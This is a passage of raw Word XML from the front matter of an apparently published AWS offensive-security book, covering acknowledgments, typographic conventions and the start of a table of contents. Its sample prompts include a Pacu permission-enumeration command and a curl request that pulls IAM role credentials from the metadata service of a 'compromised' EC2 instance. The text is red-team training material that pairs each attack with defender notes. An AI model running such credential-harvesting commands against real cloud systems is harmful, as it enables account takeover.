        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>— M. Mancuso, 2026</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45248FE9"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Acknowledgments</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26B1A9E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This book stands on a decade of open research by the AWS offensive community. Specific credit is due to Rhino Security Labs for the original IAM privilege-escalation matrix that every cloud red-team test still starts from; to the Pacu maintainers for keeping a real operator tool alive through years of AWS churn; to the CloudFox and PMapper authors for turning IAM enumeration into something you can actually read at 2 a.m.; to the ScoutSuite, Prowler, and CloudSploit projects for the guardrails; and to the St</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>ratus Red Team project for letting blue teams finally test their own assumptions against real detonations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08D0992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Thanks to every team that ever invited an outside operator into a production AWS org, trusted us with the keys, and then — crucially — let us publish what we found so the next team could close the same gap faster. Thanks to the defenders on the other side of the CloudTrail who taught this author more about AWS by responding to his exploits than any course did.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="458F4B0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Any errors, misreadings, out-of-date command flags, or missing tradecraft are the author's alone. Corrections are welcome and will be applied in the next printing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="253DFC53"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Conventions Used in This Book</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5605B925" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>Command prompts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="349C94B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Terminal captures are presented in dark-themed blocks that mimic an operator's terminal. Three prompts are used throughout:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7602D765"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sts get-caller-identity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="660E3B7E" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:spacing w:before="216" w:after="216"/>
        <w:rPr>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="d"/>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t># prompt: user shell in the operator's workstation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B0D5014"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(demo:imported-keys) &gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="c"/>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>run iam__enum_permissions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58C5DA0B" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:spacing w:before="216" w:after="216"/>
        <w:rPr>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="d"/>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t># prompt: inside the Pacu TUI, in session 'demo' with imported credentials</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="394ABC7A"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bash-5.2$</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="c"/>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>curl http://169.254.169.254/latest/meta-data/iam/security-credentials/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="032D5E0E" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:spacing w:before="216" w:after="216"/>
        <w:rPr>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="d"/>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t># prompt: on a compromised EC2 instance where the shell has no PS1 branding</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E7DE85E" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>Syntax highlighting in terminals</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F48619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Inside terminal blocks, color is meaningful:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56D425E2" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="36" w:after="36"/>
        <w:ind w:left="1008"/>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7EE787"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>green</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> — allow / success / prompt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23BE3502" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="36" w:after="36"/>
        <w:ind w:left="1008"/>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF7B72"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>red</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> — deny / failure / dangerous action</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53044266" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="36" w:after="36"/>
        <w:ind w:left="1008"/>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="D29922"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>yellow</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> — command flags, ARN fragments, role names</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6574377E" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="36" w:after="36"/>
        <w:ind w:left="1008"/>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="79C0FF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>blue</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> — command being typed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3681C0F4" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="36" w:after="36"/>
        <w:ind w:left="1008"/>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="6E7681"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>dim grey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comment or explanatory annotation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AD424DD" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>Call-out boxes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2796EC0F" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="EEF6FB"/>
        <w:divId w:val="1578637806"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>OPERATOR NOTE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63EAB0A5" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="EEF6FB"/>
        <w:divId w:val="1578637806"/>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>Operator notes are tradecraft asides — opinions on what to do, when to avoid a technique because it is loud in CloudTrail, or a shortcut the author uses in real engagements. They are informed by field experience, not dogma.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D87A8CC" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="EEF6FB"/>
        <w:divId w:val="1120609665"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>DEFENDER NOTE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18636172" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="EEF6FB"/>
        <w:divId w:val="1120609665"/>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>Defender notes translate the attack on the page into a control, an IAM policy change, a CloudTrail filter, or a detection rule. If you are reading this book to build blue-team coverage, these are the marginalia to read first.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="379E02E5" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="EEF6FB"/>
        <w:divId w:val="1355644117"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>CAUTION</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43E1D2AC" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="EEF6FB"/>
        <w:divId w:val="1355644117"/>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>Caution boxes flag destructive primitives (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>kms:ScheduleKeyDeletion</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>s3:DeleteBucket</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>ec2:TerminateInstances</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">, disruptive log actions). Confirm scope, rollback, and customer notification </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>before</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> executing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="495BF543" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>IAM action notation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67DCF0F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IAM actions are written with the service prefix, as in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>iam:CreateAccessKey</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>ec2:RunInstances</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>sts:AssumeRole</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">. Resource ARNs use the canonical form </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>arn:aws:&lt;svc&gt;:&lt;region&gt;:&lt;acct&gt;:&lt;type&gt;/&lt;name&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>. When an action is regional, the region is shown; when it is global (IAM, Organizations, CloudFront, Route53, STS legacy endpoint) the region field is empty.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22143315" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>Tool versions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BF864D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Tool versions referenced in this edition: Pacu 1.6, CloudFox 1.14, ScoutSuite 5.14, Prowler 4.3, Stratus Red Team 2.13, PMapper 1.2, trufflehog 3.63, aws-cli v2.17. Where a technique is version-sensitive the specific release is called out.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0340D556" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>MITRE ATT&amp;CK mapping</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6945004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Techniques are mapped to MITRE ATT&amp;CK for Cloud (IaaS matrix, v14). Mapping tags appear in-line as </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>[T1078.004]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Valid Accounts: Cloud Accounts), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>[T1098.001]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Additional Cloud Credentials), and so on. Appendix C lists every mapping used in the book.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1727D0C7"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Table of Contents</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D8122E1" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="chapter"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:left="1008"/>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="preface" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
            <w:lang w:val="en"/>
          </w:rPr>
          <w:t>Preface</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="num"/>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>xi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E24019C" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="chapter"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:left="1008"/>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="acknowledgments" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
            <w:lang w:val="en"/>
          </w:rPr>
          <w:t>Acknowledgments</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="num"/>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>xv</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="165E787E" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="chapter"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:left="1008"/>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="conventions" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
            <w:lang w:val="en"/>
          </w:rPr>
          <w:t>Conventions Used in This Book</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="num"/>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
